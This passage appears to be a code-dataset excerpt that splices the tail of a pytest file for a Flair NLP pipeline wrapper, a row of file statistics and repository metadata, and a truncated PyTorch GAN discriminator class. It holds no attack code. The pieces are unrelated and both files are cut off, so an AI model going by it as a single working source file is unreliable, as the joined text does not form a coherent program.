{'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 
'be.a.01', 'scores': {'wordnetId': 0}}]}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'xpos': 'PRP', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'MD', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VB', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'crash.v.01', 'scores': {'wordnetId': 0}}]}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [{'type': 'VP', 'scores': {'type': 0}, 'tokens': [18, 19]}])])])])
# assert actual == expected, actual
def test_process_fast(self):
actual = FlairPipeline().process(text, fast=True, use_ontonotes=False)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'en'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'xpos': 'DT', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 
'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'xpos': 'NNP', 'entity': 'S-LOC', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'shift.v.01', 'scores': {'wordnetId': 0}}]}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 
'be.a.01', 'scores': {'wordnetId': 0}}]}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'xpos': 'PRP', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'MD', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': '.', 'entity_iob': 'O'}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [{'type': 'VP', 'scores': {'type': 0}, 'tokens': [18, 19]}])])])])
# assert actual == expected, actual
def test_process_ontonotes(self):
actual = FlairPipeline().process(text, fast=True, use_ontonotes=True)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'en'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'xpos': 'DT', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 
'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'xpos': 'NNP', 'entity': 'S-GPE', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'shift.v.01', 'scores': {'wordnetId': 0}}]}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 
'be.a.01', 'scores': {'wordnetId': 0}}]}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'xpos': 'PRP', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'xpos': 'MD', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VB', 'entity_iob': 'O'}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19], 'labels': [{'type': 'sentiment', 'label': 'POSITIVE', 'scores': {'label': 0}}]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [{'type': 'VP', 'scores': {'type': 0}, 'tokens': [18, 19]}])])])])
# assert actual == expected, actual
def test_process_multi(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_ontonotes=False)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'multi'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'entity': 0, 'xpos': 
0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'entity': 'S-LOC', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'entity_iob': 'O'}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 13, 'text': 'People', 'characterOffsetBegin': 0, 'characterOffsetEnd': 6, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'entity_iob': 'O'}, {'id': 14, 'text': 'are', 'characterOffsetBegin': 7, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'entity_iob': 'O'}, {'id': 15, 'text': 'afraid', 'characterOffsetBegin': 11, 'characterOffsetEnd': 17, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'entity_iob': 'O'}, {'id': 16, 'text': 'that', 'characterOffsetBegin': 18, 'characterOffsetEnd': 22, 
'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'SCONJ', 'entity_iob': 'O'}, {'id': 17, 'text': 'they', 'characterOffsetBegin': 23, 'characterOffsetEnd': 27, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PRON', 'entity_iob': 'O'}, {'id': 18, 'text': 'will', 'characterOffsetBegin': 28, 'characterOffsetEnd': 32, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'AUX', 'entity_iob': 'O'}, {'id': 19, 'text': 'crash.', 'characterOffsetBegin': 33, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'entity_iob': 'O'}]), ('clauses', []), ('sentences', [{'id': '0', 'tokenFrom': 1, 'tokenTo': 13, 'tokens': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]}, {'id': '1', 'tokenFrom': 13, 'tokenTo': 20, 'tokens': [13, 14, 15, 16, 17, 18, 19]}]), ('paragraphs', []), ('dependenciesBasic', []), ('dependenciesEnhanced', []), ('coreferences', []), ('constituents', []), ('expressions', [])])])])
# assert actual == expected, actual
def test_invalid_language(self):
with pytest.raises(TypeError):
FlairPipeline().process(text, lang='martian')
def test_validation(self):
assert validation.is_valid(FlairPipeline().process(text, lang='en'))
class TestFlairEmbeddings(TestCase):
def test_no_embeddings(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='', char_embeddings=False, bpe_size=0)
assert all(map(lambda t: 'embeddings' not in t, actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
def test_default_embeddings(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='default', char_embeddings=False, bpe_size=0)
assert all(map(lambda t: t['embeddings'][0]['model'] == 'Flair glove,multi-forward,multi-backward',
actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
def test_character_embeddings(self):
actual = FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='', char_embeddings=True, bpe_size=0)
assert all(map(lambda t: t['embeddings'][0]['model'] == 'Flair ,char',
actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
def test_bpe(self):
actual = FlairPipeline().process(text, lang='en', fast=True, use_embeddings='', char_embeddings=False, bpe_size=50)
assert all(map(lambda t: t['embeddings'][0]['model'] == 'Flair ,byte-pair_50',
actual['documents'][1]['tokenList'].values())), actual['documents'][1]['tokenList'][1]['embeddings'][0]['model']
with pytest.raises(ValueError):
FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='', char_embeddings=False, bpe_size=50)
with pytest.raises(ValueError):
FlairPipeline().process(text, lang='en', bpe_size=45)
def test_invalid(self):
with pytest.raises(ValueError):
FlairPipeline().process(text, lang='multi', fast=True, use_embeddings='martian', char_embeddings=False, bpe_size=0)
def test_validation_default(self):
assert validation.is_valid(FlairPipeline().process(text, lang='en', use_embeddings='default'))
def test_validation_bpe(self):
assert validation.is_valid(FlairPipeline().process(text, lang='en', bpe_size=50))
def test_validation_chars(self):
assert validation.is_valid(FlairPipeline().process(text, lang='en', char_embeddings=True))
| 270.039604 | 5,872 | 0.583889 | 3,211 | 27,274 | 4.91716 | 0.067892 | 0.048768 | 0.053645 | 0.105897 | 0.946798 | 0.944455 | 0.928938 | 0.927925 | 0.924504 | 0.918931 | 0 | 0.041962 | 0.125357 | 27,274 | 100 | 5,873 | 272.74 | 0.619912 | 0.844357 | 0 | 0.151515 | 0 | 0.015152 | 0.160275 | 0.008049 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.227273 | false | 0 | 0.090909 | 0 | 0.348485 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
033c545d69902b203a3aed50730c91ccd007e842 | 9,830 | py | Python | models/disc_cnn.py | bmeatayi/neurogan | 310590e648a68f2966312aa0b460908d719e964d | [
"MIT"
] | null | null | null | models/disc_cnn.py | bmeatayi/neurogan | 310590e648a68f2966312aa0b460908d719e964d | [
"MIT"
] | null | null | null | models/disc_cnn.py | bmeatayi/neurogan | 310590e648a68f2966312aa0b460908d719e964d | [
"MIT"
] | null | null | null | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
class DiscriminatorCNN_proj(nn.Module):
def __init__(self, nw=40, nh=40, nl=5,
n_filters=(15, 9),
kernel_size=(15, 11),
n_cell=1):
super(DiscriminatorCNN_proj, self).__init__()
self.nW = nw
self.nH = nh
self.nL = nl
self.nFiltL1 = n_filters[0]
self.nFiltL2 = n_filters[1]
self.szFiltL1 = kernel_size[0]
self.szFiltL2 = kernel_size[1]
self.nCell = n_cell
self.l3_filt_shape = None
self.conv1 = nn.utils.spectral_norm(nn.Conv2d(in_channels=self.nL,
out_channels=self.nFiltL1,
kernel_size=(self.szFiltL1, self.szFiltL1),
stride=1,
padding=0,
bias=True))
self.conv2 = nn.utils.spectral_norm(nn.Conv2d(in_channels=self.nFiltL1,
out_channels=self.nFiltL2,
kernel_size=(self.szFiltL2, self.szFiltL2),
stride=1,
padding=0,
bias=True))
in_shp, conv2outShape = self._compute_fc_in()
self.l3_filt_shape = (self.nCell, *conv2outShape)
self.fc1 = nn.utils.spectral_norm(nn.Linear(in_features=in_shp, out_features=self.nCell, bias=True))
self.fc2 = nn.utils.spectral_norm(nn.Linear(in_features=self.nCell, out_features=64, bias=True))
self.fc3 = nn.utils.spectral_norm(nn.Linear(in_features=64, out_features=1, bias=True))
self.fcSpike1 = nn.utils.spectral_norm(nn.Linear(in_features=self.nCell, out_features=32, bias=True))
self.fcSpike2 = nn.utils.spectral_norm(nn.Linear(in_features=32, out_features=64, bias=True))
self.fcSpike3 = nn.utils.spectral_norm(nn.Linear(in_features=64, out_features=self.nCell, bias=True))
def forward(self, spike, stim):
x_conv = F.relu(self.conv1(stim))
x_conv = F.relu(self.conv2(x_conv))
x_fc1 = F.relu(self.fc1(x_conv.view([x_conv.shape[0], -1])))
x_fc2 = F.relu(self.fc2(x_fc1))
x_sp = F.relu(self.fcSpike1(spike))
x_sp = F.relu(self.fcSpike2(x_sp))
x_sp = F.relu(self.fcSpike3(x_sp))
